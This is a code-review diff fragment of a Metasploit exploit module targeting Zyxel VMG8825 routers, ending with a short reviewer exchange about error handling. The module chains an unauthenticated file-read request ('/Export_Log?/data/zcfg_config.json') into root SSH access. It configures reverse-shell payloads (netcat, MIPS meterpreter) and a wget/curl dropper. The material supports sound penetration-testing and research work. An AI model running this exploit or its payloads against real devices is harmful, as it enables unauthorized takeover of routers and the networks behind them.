modules/exploits/linux/http/zyxel_lfi_unauth_ssh_rce.rb

```diff
@@ -0,0 +1,305 @@
+          ['URL', 'https://th0mas.nl/2020/03/26/getting-root-on-a-zyxel-vmg8825-t50-router/'],
+          ['URL', 'https://github.com/boginw/zyxel-vmg8825-keygen'],
+          ['URL', 'https://attackerkb.com/topics/dkw2Y2zdyN/zyxel-chained-rce-using-lfi-and-weak-aes-encryption-no-cve']
+        ],
+        'DisclosureDate' => '2022-02-01',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_MIPSBE],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_MIPSBE],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['printf', 'echo', 'bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/mipsbe/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Interactive SSH',
+            {
+              'DefaultOptions' => {
+                'PAYLOAD' => 'generic/ssh/interact'
+              },
+              'Payload' => {
+                'Compat' => {
+                  'PayloadType' => 'ssh_interact'
+                }
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+  end
+
+  def get_configuration
+    # Get the device configuration by exploiting the LFI vulnerability
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/Export_Log?/data/zcfg_config.json')
+    })
+  end
+
+  def process_configuration(res)
+    # Initiate the hash_config
+    hash_config = { 'hardware' => nil, 'software' => nil, 'serial' => nil, 'ssh_user' => nil, 'ssh_port' => nil, 'ssh_wan_access' => nil, 'ssh_service_enabled' => nil }
+    # Parse the device configuration json file
+    begin
+      res_json = res.get_json_document
+    rescue JSON::ParserError => e
+      print_error(Failure::Unknown, "Unable to parse the JSON response. Error: #{e}")
```

Comment:
Should this be a `fail_with`?

Reply:
This function `process_configuration`  is used in both the `check` and ` exploit` phase and from previous reviews ` fail_with`  should never be during `check`